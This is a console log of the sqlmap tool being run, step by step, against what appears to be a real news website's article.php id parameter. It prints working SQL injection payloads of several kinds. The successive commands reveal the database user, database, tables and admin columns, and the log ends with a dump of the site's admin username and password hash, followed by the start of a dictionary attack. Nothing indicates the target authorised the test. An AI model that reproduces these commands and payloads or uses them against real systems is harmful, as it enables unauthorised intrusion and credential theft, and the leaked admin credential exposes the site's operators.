D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0 /* get the column names of the admin table */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns */
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>